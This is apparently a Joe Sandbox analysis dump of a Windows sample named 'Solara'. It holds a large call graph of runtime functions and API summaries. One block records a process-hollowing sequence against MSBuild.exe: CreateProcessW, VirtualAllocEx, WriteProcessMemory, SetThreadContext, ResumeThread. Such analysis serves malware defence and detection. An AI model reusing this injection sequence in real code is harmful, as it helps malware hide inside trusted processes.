21860->21861 21862 22435e 21861->21862 21862->21830 21863 21f5d1 40 API calls _Fputc 21863->21864 21864->21860 21864->21863 21865 228fd5 5 API calls std::_Locinfo::_Locinfo_dtor 21864->21865 21866 21c021 _Fputc WideCharToMultiByte 21864->21866 21867 224246 WriteFile 21864->21867 21869 224284 WriteFile 21864->21869 21865->21864 21866->21864 21867->21864 21868 22433c GetLastError 21867->21868 21868->21860 21869->21864 21869->21868 21872 2244b7 _Fputc 21870->21872 21871 224576 21874 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21871->21874 21872->21871 21873 22452c WriteFile 21872->21873 21873->21872 21875 224578 GetLastError 21873->21875 21876 22458f 21874->21876 21875->21871 21876->21831 21881 2245a0 _Fputc 21877->21881 21878 2246a8 21879 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21878->21879 21880 2246c1 21879->21880 21880->21830 21881->21878 21882 21c021 _Fputc WideCharToMultiByte 21881->21882 21883 2246aa GetLastError 21881->21883 21884 22465f WriteFile 21881->21884 21882->21881 21883->21878 21884->21881 21884->21883 21886 22361f _Fputc 29 API calls 21885->21886 21887 222b15 21886->21887 21888 222b31 SetFilePointerEx 21887->21888 21890 222b1d __fread_nolock 21887->21890 21889 222b49 GetLastError 21888->21889 21888->21890 21889->21890 21890->21851 21891->21834 21892->21388 21893 210312 21894 21031e ___scrt_is_nonwritable_in_current_image 21893->21894 21919 20a8ca 21894->21919 21896 210325 21897 21047e 21896->21897 21907 21034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 21896->21907 21972 20f8e9 IsProcessorFeaturePresent 21897->21972 21899 210485 21954 215545 21899->21954 21902 21555b std::locale::_Setgloballocale 21 API calls 21903 210493 21902->21903 21904 21036e 21905 2103ef 21930 217abc 21905->21930 21907->21904 21907->21905 21957 21558f 21907->21957 21909 2103f5 21934 2024b0 GetConsoleWindow ShowWindow 21909->21934 21911 21040c 21912 20f896 std::locale::_Setgloballocale GetModuleHandleW 21911->21912 21913 210416 21912->21913 21913->21899 21914 21041a 21913->21914 21915 210423 21914->21915 21963 215571 21914->21963 21966 20a903 21915->21966 21920 20a8d3 21919->21920 21976 20f555 IsProcessorFeaturePresent 21920->21976 21924 20a8e4 21925 20a8e8 21924->21925 21986 213230 21924->21986 21925->21896 21928 20a8ff 21928->21896 21931 217ac5 21930->21931 21932 217aca 21930->21932 22058 217be5 21931->22058 21932->21909 21935 20a663 std::ios_base::_Init 3 API calls 21934->21935 21936 2024f3 21935->21936 22542 215349 21936->22542 21938 202513 21939 202554 21938->21939 21940 20251d 21938->21940 21941 20b317 std::_Throw_Cpp_error 30 API calls 21939->21941 21942 202524 GetCurrentThreadId 21940->21942 21943 20256c 21940->21943 21941->21943 21945 20257d 21942->21945 21946 20252d 21942->21946 21944 20b317 std::_Throw_Cpp_error 30 API calls 21943->21944 21944->21945 21947 20b317 std::_Throw_Cpp_error 30 API calls 21945->21947 22557 20f11d WaitForSingleObjectEx 21946->22557 21949 20258e 21947->21949 21952 20b317 std::_Throw_Cpp_error 30 API calls 21949->21952 21951 202541 21951->21911 21953 20259f 21952->21953 21953->21911 21955 215690 std::locale::_Setgloballocale 21 API calls 21954->21955 21956 21048b 21955->21956 21956->21902 21958 2155a5 ___scrt_is_nonwritable_in_current_image std::_Locinfo::_Locinfo_dtor 21957->21958 21958->21905 21959 21c16a __Getctype 39 API calls 21958->21959 21962 21a17c 21959->21962 21960 218353 CallUnexpected 39 API calls 21961 21a1a6 21960->21961 21962->21960 21964 215690 std::locale::_Setgloballocale 21 API calls 21963->21964 21965 21557c 21964->21965 21965->21915 21967 20a90f 21966->21967 21968 20a925 21967->21968 22619 213242 21967->22619 21968->21904 21970 20a91d 21971 210ce7 ___scrt_uninitialize_crt 7 API calls 21970->21971 21971->21968 21973 20f8ff __fread_nolock std::locale::_Setgloballocale 21972->21973 21974 20f9aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21973->21974 21975 20f9ee std::locale::_Setgloballocale 21974->21975 21975->21899 21977 20a8df 21976->21977 21978 210cc8 21977->21978 21995 21bba6 21978->21995 21982 210cd9 21983 210ce4 21982->21983 22009 21bbe2 21982->22009 21983->21924 21985 210cd1 21985->21924 22049 21e2e9 21986->22049 21989 210ce7 21990 210cf0 21989->21990 21991 210cfa 21989->21991 21992 21acbe ___vcrt_uninitialize_ptd 6 API calls 21990->21992 21991->21925 21993 210cf5 21992->21993 21994 21bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21993->21994 21994->21991 21996 21bbaf 21995->21996 21998 21bbd8 21996->21998 21999 210ccd 21996->21999 22013 2268f9 21996->22013 22000 21bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21998->22000 21999->21985 22001 21ac8b 21999->22001 22000->21999 22030 22680a 22001->22030 22006 21acbb 22006->21982 22008 21aca0 22008->21982 22010 21bc0c 22009->22010 22011 21bbed 22009->22011 22010->21985 22012 21bbf7 DeleteCriticalSection 22011->22012 22012->22010 22012->22012 22018 22698b 22013->22018 22016 226931 InitializeCriticalSectionAndSpinCount 22017 22691c 22016->22017 22017->21996 22019 226913 22018->22019 22022 2269ac 22018->22022 22019->22016 22019->22017 22020 226a14 GetProcAddress 22020->22019 22022->22019 22022->22020 22023 226a05 22022->22023 22025 226940 LoadLibraryExW 22022->22025 22023->22020 22024 226a0d FreeLibrary 22023->22024 22024->22020 22026 226957 GetLastError 22025->22026 22027 226987 22025->22027 22026->22027 22028 226962 ___vcrt_FlsFree 22026->22028 22027->22022 22028->22027 22029 226978 LoadLibraryExW 22028->22029 22029->22022 22031 22698b ___vcrt_FlsFree 5 API calls 22030->22031 22032 226824 22031->22032 22033 22683d TlsAlloc 22032->22033 22034 21ac95 22032->22034 22034->22008 22035 2268bb 22034->22035 22036 22698b ___vcrt_FlsFree 5 API calls 22035->22036 22037 2268d5 22036->22037 22038 2268f0 TlsSetValue 22037->22038 22039 21acae 22037->22039 22038->22039 22039->22006 22040 21acbe 22039->22040 22041 21acce 22040->22041 22042 21acc8 22040->22042 22041->22008 22044 226845 22042->22044 22045 22698b ___vcrt_FlsFree 5 API calls 22044->22045 22046 22685f 22045->22046 22047 226877 TlsFree 22046->22047 22048 22686b 22046->22048 22047->22048 22048->22041 22050 21e2f9 22049->22050 22051 20a8f1 22049->22051 22050->22051 22053 21da52 22050->22053 22051->21928 22051->21989 22054 21da59 22053->22054 22055 21da9c GetStdHandle 22054->22055 22056 21dafe 22054->22056 22057 21daaf GetFileType 22054->22057 22055->22054 22056->22050 22057->22054 22059 217bee 22058->22059 22063 217c04 22058->22063 22059->22063 22064 217b26 22059->22064 22061 217bfb 22061->22063 22081 217cf3 22061->22081 22063->21932 22065 217b32 22064->22065 22066 217b2f 22064->22066 22090 21db20 22065->22090 22066->22061 22071 217b43 22073 21bed7 ___free_lconv_mon 14 API calls 22071->22073 22072 217b4f 22117 217c11 22072->22117 22075 217b49 22073->22075 22075->22061 22077 21bed7 ___free_lconv_mon 14 API calls 22078 217b73 22077->22078 22079 21bed7 ___free_lconv_mon 14 API calls 22078->22079 22080 217b79 22079->22080 22080->22061 22082 217d64 22081->22082 22085 217d02 22081->22085 22082->22063 22083 21c021 WideCharToMultiByte _Fputc 22083->22085 22084 21d2b4 __dosmaperr 14 API calls 22084->22085 22085->22082 22085->22083 22085->22084 22087 217d68 22085->22087 22089 21bed7 ___free_lconv_mon 14 API calls 22085->22089 22330 223295 22085->22330 22086 21bed7 ___free_lconv_mon 14 API calls 22086->22082 22087->22086 22089->22085 22091 217b38 22090->22091 22092 21db29 22090->22092 22096 2231be GetEnvironmentStringsW 22091->22096 22139 21c225 22092->22139 22097 2231d6 22096->22097 22110 217b3d 22096->22110 22098 21c021 _Fputc WideCharToMultiByte 22097->22098 22099 2231f3 22098->22099 22100 223208 22099->22100 22101 2231fd FreeEnvironmentStringsW 22099->22101 22102 21bf11 __fread_nolock 15 API calls 22100->22102 22101->22110 22103 22320f 22102->22103 22104 223217 22103->22104 22105 223228 22103->22105 22106 21bed7 ___free_lconv_mon 14 API calls 22104->22106 22107 21c021 _Fputc WideCharToMultiByte 22105->22107 22108 22321c FreeEnvironmentStringsW 22106->22108 22109 223238 22107->22109 22108->22110 22111 223247 22109->22111 22112 22323f 22109->22112 22110->22071 22110->22072 22113 21bed7 ___free_lconv_mon 14 API calls 22111->22113 22114 21bed7 ___free_lconv_mon 14 API calls 22112->22114 22115 223245 FreeEnvironmentStringsW 22113->22115 22114->22115 22115->22110 22118 217c26 22117->22118 22119 21d2b4 __dosmaperr 14 API calls 22118->22119 22120 217c4d 22119->22120 22121 217c55 22120->22121 22130 217c5f 22120->22130 22122 21bed7 ___free_lconv_mon 14 API calls 22121->22122 22138 217b56 22122->22138 22123 217cbc 22124 21bed7 ___free_lconv_mon 14 API calls 22123->22124 22124->22138 22125 21d2b4 __dosmaperr 14 API calls 22125->22130 22126 217ccb 22324 217bb6 22126->22324 22128 21bb4c ___std_exception_copy 29 API calls 22128->22130 22130->22123 22130->22125 22130->22126 22130->22128 22132 217ce6 22130->22132 22134 21bed7 ___free_lconv_mon 14 API calls 22130->22134 22131 21bed7 ___free_lconv_mon 14 API calls 22133 217cd8 22131->22133 22135 217dfc __Getctype 11 API calls 22132->22135 22136 21bed7 ___free_lconv_mon 14 API calls 22133->22136 22134->22130 22137 217cf2 22135->22137 22136->22138 22138->22077 22140 21c230 22139->22140 22141 21c236 22139->22141 22142 21cb94 __dosmaperr 6 API calls 22140->22142 22143 21cbd3 __dosmaperr 6 API calls 22141->22143 22160 21c23c 22141->22160 22142->22141 22144 21c250 22143->22144 22145 21d2b4 __dosmaperr 14 API calls 22144->22145 22144->22160 22147 21c260 22145->22147 22146 218353 CallUnexpected 39 API calls 22148 21c2ba 22146->22148 22149 21c268 22147->22149 22150 21c27d 22147->22150 22151 21cbd3 __dosmaperr 6 API calls 22149->22151 22152 21cbd3 __dosmaperr 6 API calls 22150->22152 22161 21c274 22151->22161 22153 21c289 22152->22153 22154 21c28d 22153->22154 22155 21c29c 22153->22155 22158 21cbd3 __dosmaperr 6 API calls 22154->22158 22156 21c47c __dosmaperr 14 API calls 22155->22156 22159 21c2a7 22156->22159 22157 21bed7 ___free_lconv_mon 14 API calls 22157->22160 22158->22161 22162 21bed7 ___free_lconv_mon 14 API calls 22159->22162 22160->22146 22163 21c241 22160->22163 22161->22157 22162->22163 22164 21dee1 22163->22164 22165 21df0b 22164->22165 22186 21dd6d 22165->22186 22168 21bf11 __fread_nolock 15 API calls 22169 21df35 22168->22169 22170 21df4b 22169->22170 22171 21df3d 22169->22171 22193 21db68 22170->22193 22172 21bed7 ___free_lconv_mon 14 API calls 22171->22172 22174 21df24 22172->22174 22174->22091 22176 21df83 22177 2176e4 __strnicoll 14 API calls 22176->22177 22179 21df88 22177->22179 22178 21dfca 22181 21e013 22178->22181 22204 21e29c 22178->22204 22182 21bed7 ___free_lconv_mon 14 API calls 22179->22182 22180 21df9e 22180->22178 22183 21bed7 ___free_lconv_mon 14 API calls 22180->22183 22185 21bed7 ___free_lconv_mon 14 API calls 22181->22185 22182->22174 22183->22178 22185->22174 22212 21297a 22186->22212 22189 21dda0 22191 21ddb7 22189->22191 22192 21dda5 GetACP 22189->22192 22190 21dd8e GetOEMCP 22190->22191 22191->22168 22191->22174 22192->22191 22194 21dd6d 41 API calls 22193->22194 22196 21db88 22194->22196 22195 21dc8d 22197 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22195->22197 22196->22195 22198 21dbc5 IsValidCodePage 22196->22198 22203 21dbe0 __fread_nolock 22196->22203 22199 21dd6b 22197->22199 22198->22195 22200 21dbd7 22198->22200 22199->22176 22199->22180 22201 21dc00 GetCPInfo 22200->22201 22200->22203 22201->22195 22201->22203 22224 21e0f7 22203->22224 22205 21e2a8 ___scrt_is_nonwritable_in_current_image 22204->22205 22298 2180e1 EnterCriticalSection 22205->22298 22207 21e2b2 22299 21e036 22207->22299 22213 212991 22212->22213 22214 212998 22212->22214 22213->22189 22213->22190 22214->22213 22215 21c16a __Getctype 39 API calls 22214->22215 22216 2129b9 22215->22216 22217 21c74e __Getctype 39 API calls 22216->22217 22218 2129cf 22217->22218 22220 21c77b 22218->22220 22221 21c78e 22220->22221 22223 21c7a3 22220->22223 22222 21db02 __strnicoll 39 API calls 22221->22222 22221->22223 22222->22223 22223->22213 22225 21e11f GetCPInfo 22224->22225 22234 21e1e8 22224->22234 22231 21e137 22225->22231 22225->22234 22227 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22229 21e29a 22227->22229 22229->22195 22235 21d5a0 22231->22235 22234->22227 22236 21297a __strnicoll 39 API calls 22235->22236 22237 21d5c0 22236->22237 22255 21bf5f 22237->22255 22239 21d67c 22242 20a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22239->22242 22240 21d674 22258 20fe0b 22240->22258 22241 21d5ed 22241->22239 22241->22240 22244 21bf11 __fread_nolock 15 API calls 22241->22244 22246 21d612 __fread_nolock __alloca_probe_16 22241->22246 22245 21d69f 22242->22245 22244->22246 22250 21d6a1 22245->22250 22246->22240 22247 21bf5f __fread_nolock MultiByteToWideChar 22246->22247 22248 21d65b 22247->22248 22248->22240 22249 21d662 GetStringTypeW 22248->22249 22249->22240 22262 21bf89 22255->22262 22259 20fe15 22258->22259 22260 20fe26 22258->22260 22259->22260 22260->22239 22263 21bf7b MultiByteToWideChar 22262->22263 22263->22241 22298->22207 22309 218fc3 22299->22309 22301 21e058 22302 218fc3 __fread_nolock 29 API calls 22301->22302 22310 218fd4 22309->22310 22319 218fd0 codecvt 22309->22319 22311 218fdb 22310->22311 22312 218fee __fread_nolock 22310->22312 22313 2176e4 __strnicoll 14 API calls 22311->22313 22316 219025 22312->22316 22317 21901c 22312->22317 22312->22319 22314 218fe0 22313->22314 22316->22319 22321 2176e4 __strnicoll 14 API calls 22316->22321 22318 2176e4 __strnicoll 14 API calls 22317->22318 22319->22301 22325 217bc3 22324->22325 22326 217be0 22324->22326 22327 217bda 22325->22327 22328 21bed7 ___free_lconv_mon 14 API calls 22325->22328 22326->22131 22329 21bed7 ___free_lconv_mon 14 API calls 22327->22329 22328->22325 22329->22326 22331 2232a0 22330->22331 22332 2232b1 22331->22332 22335 2232c4 ___from_strstr_to_strchr 22331->22335 22333 2176e4 __strnicoll 14 API calls 22332->22333 22342 2232b6 22333->22342 22334 2234db 22336 2176e4 __strnicoll 14 API calls 22334->22336 22335->22334 22337 2232e4 22335->22337 22338 2234e0 22336->22338 22393 223500 22337->22393 22340 21bed7 ___free_lconv_mon 14 API calls 22338->22340 22340->22342 22342->22085 22343 223328 22344 223314 22343->22344 22397 22351a 22343->22397 22350 21bed7 ___free_lconv_mon 14 API calls 22344->22350 22345 22332a 22345->22344 22349 21d2b4 __dosmaperr 14 API calls 22345->22349 22347 223306 22352 223323 22347->22352 22353 22330f 22347->22353 22351 223338 22349->22351 22350->22342 22355 21bed7 ___free_lconv_mon 14 API calls 22351->22355 22357 223500 39 API calls 22352->22357 22356 2176e4 __strnicoll 14 API calls 22353->22356 22354 22339d 22358 21bed7 ___free_lconv_mon 14 API calls 22354->22358 22359 223343 22355->22359 22356->22344 22357->22343 22364 2233a5 22358->22364 22359->22343 22359->22344 22362 21d2b4 __dosmaperr 14 API calls 22359->22362 22360 2233e8 22360->22344 22361 2228b5 std::ios_base::_Init 32 API calls 22360->22361 22363 223416 22361->22363 22365 22335f 22362->22365 22366 21bed7 ___free_lconv_mon 14 API calls 22363->22366 22370 2233d2 22364->22370 22401 2228b5 22364->22401 22368 21bed7 ___free_lconv_mon 14 API calls 22365->22368 22366->22370 22368->22343 22369 21bed7 ___free_lconv_mon 14 API calls 22369->22342 22370->22344 22373 21d2b4 __dosmaperr 14 API calls 22370->22373 22391 2234d0 22370->22391 22371 2233c9 22372 21bed7 ___free_lconv_mon 14 API calls 22371->22372 22372->22370 22374 223461 22373->22374 22375 223471 22374->22375 22376 223469 22374->22376 22378 21bb4c ___std_exception_copy 29 API calls 22375->22378 22377 21bed7 ___free_lconv_mon 14 API calls 22376->22377 22377->22344 22379 22347d 22378->22379 22380 223484 22379->22380 22381 2234f5 22379->22381 22410 22a23c 22380->22410 22382 217dfc __Getctype 11 API calls 22381->22382 22384 2234ff 22382->22384 22391->22369 22394 2232ef 22393->22394 22395 22350d 22393->22395 22394->22343 22394->22345 22394->22347 22425 22356f 22395->22425 22398 22338d 22397->22398 22400 223530 22397->22400 22398->22354 22398->22360 22400->22398 22440 22a14b 22400->22440 22402 2228c2 22401->22402 22403 2228dd 22401->22403 22402->22403 22404 2228ce 22402->22404 22405 2228ec 22403->22405 22474 229a54 22403->22474 22406 2176e4 __strnicoll 14 API calls 22404->22406 22481 2262a0 22405->22481 22409 2228d3 __fread_nolock 22406->22409 22409->22371 22493 21d275 22410->22493 22415 22a2af 22418 21bed7 ___free_lconv_mon 14 API calls 22415->22418 22420 22a2bb 22415->22420 22416 21d275 39 API calls 22417 22a28c 22416->22417 22418->22420 22426 223582 22425->22426 22432 22357d 22425->22432 22427 21d2b4 __dosmaperr 14 API calls 22426->22427 22437 22359f 22427->22437 22428 22360d 22429 218353 CallUnexpected 39 API calls 22428->22429 22431 223612 22429->22431 22430 21bed7 ___free_lconv_mon 14 API calls 22430->22432 22433 217dfc __Getctype 11 API calls 22431->22433 22432->22394 22434 22361e 22433->22434 22435 21d2b4 __dosmaperr 14 API calls 22435->22437 22436 21bed7 ___free_lconv_mon 14 API calls 22436->22437 22437->22428 22437->22431 22437->22435 22437->22436 22438 21bb4c ___std_exception_copy 29 API calls 22437->22438 22439 2235fc 22437->22439 22438->22437 22439->22430 22441 22a159 22440->22441 22442 22a15f 22440->22442 22443 22a973 22441->22443 22444 22a9bb 22441->22444 22442->22400 22445 22a979 22443->22445 22448 22a996 22443->22448 22456 22a9d1 22444->22456 22447 2176e4 __strnicoll 14 API calls 22445->22447 22450 22a97e 22447->22450 22452 2176e4 __strnicoll 14 API calls 22448->22452 22455 22a9b4 22448->22455 22449 22a989 22449->22400 22451 217dcf __strnicoll 29 API calls 22450->22451 22451->22449 22453 22a9a5 22452->22453 22454 217dcf __strnicoll 29 API calls 22453->22454 22454->22449 22455->22400 22457 22a9e1 22456->22457 22458 22a9fb 22456->22458 22461 2176e4 __strnicoll 14 API calls 22457->22461 22459 22aa03 22458->22459 22460 22aa1a 22458->22460 22462 2176e4 __strnicoll 14 API calls 22459->22462 22463 22aa26 22460->22463 22464 22aa3d 22460->22464 22465 22a9e6 22461->22465 22466 22aa08 22462->22466 22467 2176e4 __strnicoll 14 API calls 22463->22467 22471 21297a __strnicoll 39 API calls 22464->22471 22473 22a9f1 22464->22473 22468 217dcf __strnicoll 29 API calls 22465->22468 22469 217dcf __strnicoll 29 API calls 22466->22469 22470 22aa2b 22467->22470 22468->22473 22469->22473 22472 217dcf __strnicoll 29 API calls 22470->22472 22471->22473 22472->22473 22473->22449 22475 229a74 HeapSize 22474->22475 22476 229a5f 22474->22476 22475->22405 22477 2176e4 __strnicoll 14 API calls 22476->22477 22478 229a64 22477->22478 22479 217dcf __strnicoll 29 API calls 22478->22479 22480 229a6f 22479->22480 22480->22405 22482 2262b8 22481->22482 22483 2262ad 22481->22483 22485 2262c0 22482->22485 22491 2262c9 __dosmaperr 22482->22491 22484 21bf11 __fread_nolock 15 API calls 22483->22484 22489 2262b5 22484->22489 22486 21bed7 ___free_lconv_mon 14 API calls 22485->22486 22486->22489 22487 2262f3 HeapReAlloc 22487->22489 22487->22491 22488 2262ce 22490 2176e4 __strnicoll 14 API calls 22488->22490 22489->22409 22490->22489 22491->22487 22491->22488 22492 215877 std::ios_base::_Init 2 API calls 22491->22492 22492->22491 22494 21297a __strnicoll 39 API calls 22493->22494 22496 21d287 22494->22496 22495 21d299 22498 212a74 22495->22498 22496->22495 22501 21ca46 22496->22501 22504 212acc 22498->22504 22502 21d05b std::_Locinfo::_Locinfo_dtor 5 API calls 22501->22502 22503 21ca4e 22502->22503 22503->22495 22505 212af4 22504->22505 22506 212ada 22504->22506 22508 212b1a 22505->22508 22510 212afb 22505->22510 22522 212a5a 22506->22522 22509 21bf5f __fread_nolock MultiByteToWideChar 22508->22509 22511 212b29 22509->22511 22513 212a8c 22510->22513 22526 212a1b 22510->22526 22514 212b30 GetLastError 22511->22514 22516 212b56 22511->22516 22518 212a1b 15 API calls 22511->22518 22513->22415 22513->22416 22516->22513 22518->22516 22523 212a6d 22522->22523 22524 212a65 22522->22524 22523->22513 22525 21bed7 ___free_lconv_mon 14 API calls 22524->22525 22525->22523 22527 212a5a 14 API calls 22526->22527 22543 215356 22542->22543 22544 21536a 22542->22544 22545 2176e4 __strnicoll 14 API calls 22543->22545 22563 2153da 22544->22563 22547 21535b 22545->22547 22549 217dcf __strnicoll 29 API calls 22547->22549 22551 215366 22549->22551 22550 21537f CreateThread 22552 2153aa 22550->22552 22553 21539e GetLastError 22550->22553 22580 215470 22550->22580 22551->21938 22572 21542a 22552->22572 22554 21770a __dosmaperr 14 API calls 22553->22554 22554->22552 22556 2153b5 22556->21938 22558 20f134 22557->22558 22559 20253a 22557->22559 22560 20f151 CloseHandle 22558->22560 22561 20f13b GetExitCodeThread 22558->22561 22559->21949 22559->21951 22560->22559 22561->22559 22562 20f14c 22561->22562 22562->22560 22564 21d2b4 __dosmaperr 14 API calls 22563->22564 22565 2153eb 22564->22565 22566 21bed7 ___free_lconv_mon 14 API calls 22565->22566 22567 2153f8 22566->22567 22568 21541c 22567->22568 22569 2153ff GetModuleHandleExW 22567->22569 22570 21542a 16 API calls 22568->22570 22569->22568 22571 215376 22570->22571 22571->22550 22571->22552 22573 215436 22572->22573 22574 21545a 22572->22574 22575 215445 22573->22575 22576 21543c CloseHandle 22573->22576 22574->22556 22577 215454 22575->22577 22578 21544b FreeLibrary 22575->22578 22576->22575 22579 21bed7 ___free_lconv_mon 14 API calls 22577->22579 22578->22577 22579->22574 22581 21547c ___scrt_is_nonwritable_in_current_image 22580->22581 22582 215490 22581->22582 22583 215483 GetLastError ExitThread 22581->22583 22584 21c16a __Getctype 39 API calls 22582->22584 22585 215495 22584->22585 22594 21f767 22585->22594 22588 2154ac 22598 2153cc 22588->22598 22595 2154a0 22594->22595 22596 21f777 std::locale::_Setgloballocale 22594->22596 22595->22588 22601 21cde0 22595->22601 22596->22595 22604 21ce89 22596->22604 22607 2154ee 22598->22607 22602 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 22601->22602 22603 21cdfc 22602->22603 22603->22588 22605 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 22604->22605 22606 21cea5 22605->22606 22606->22595 22608 21c2bb __dosmaperr 14 API calls 22607->22608 22610 2154f9 22608->22610 22609 21553b ExitThread 22610->22609 22611 215512 22610->22611 22616 21ce1b 22610->22616 22613 215525 22611->22613 22614 21551e CloseHandle 22611->22614 22613->22609 22615 215531 FreeLibraryAndExitThread 22613->22615 22614->22613 22615->22609 22617 21cfd6 std::_Locinfo::_Locinfo_dtor 5 API calls 22616->22617 22618 21ce34 22617->22618 22618->22611 22620 21324d 22619->22620 22621 21325f ___scrt_uninitialize_crt 22619->22621 22622 21325b 22620->22622 22624 21854a 22620->22624 22621->21970 22622->21970 22627 218675 22624->22627 22630 21874e 22627->22630 22631 21875a ___scrt_is_nonwritable_in_current_image 22630->22631 22638 2180e1 EnterCriticalSection 22631->22638 22633 218764 ___scrt_uninitialize_crt 22634 2187d0 22633->22634 22639 2186c2 22633->22639 22647 2187ee 22634->22647 22638->22633 22640 2186ce ___scrt_is_nonwritable_in_current_image 22639->22640 22650 213315 EnterCriticalSection 22640->22650 22642 2186d8 ___scrt_uninitialize_crt 22643 218711 22642->22643 22651 218553 22642->22651 22707 2180f8 LeaveCriticalSection 22647->22707 22649 218551 22649->22622 22650->22642 22707->22649 22708 2192d7 22709 21bed7 ___free_lconv_mon 14 API calls 22708->22709 22710 2192ef 22709->22710 22711 23a19e 22715 23a1d4 22711->22715 22712 23a321 GetPEB 22713 23a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 22712->22713 22714 23a3da WriteProcessMemory 22713->22714 22713->22715 22716 23a41f 22714->22716 22715->22712 22715->22713 22717 23a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 22716->22717 22718 23a424 WriteProcessMemory 22716->22718 22718->22716

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0023A110,0023A100), ref: 0023A334
                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0023A347
                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000050,00000000), ref: 0023A365
                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000098,?,0023A154,00000004,00000000), ref: 0023A389
                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 0023A3B4
                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 0023A40C
                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 0023A457
                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 0023A495
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000050,03260000), ref: 0023A4D1
                                                                                                                                      • ResumeThread.KERNELBASE(00000050), ref: 0023A4E0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                      • API String ID: 2687962208-3857624555
                                                                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                      • Instruction ID: bd599e7c84ca9ee6aa319f573d5e15d30555f1851012e0bade9900b72c6fd8c9
                                                                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                      • Instruction Fuzzy Hash: 81B1097260024AAFDB60CF68CC80BDAB3A5FF88714F158165EA4CAB341D774FA51CB94

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00201240: _strlen.LIBCMT ref: 002012BA
                                                                                                                                      • CreateFileA.KERNELBASE ref: 00202036
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00202046
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0020206B
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0020207A
                                                                                                                                      • _strlen.LIBCMT ref: 002020CD
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 002021FD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                      • String ID:
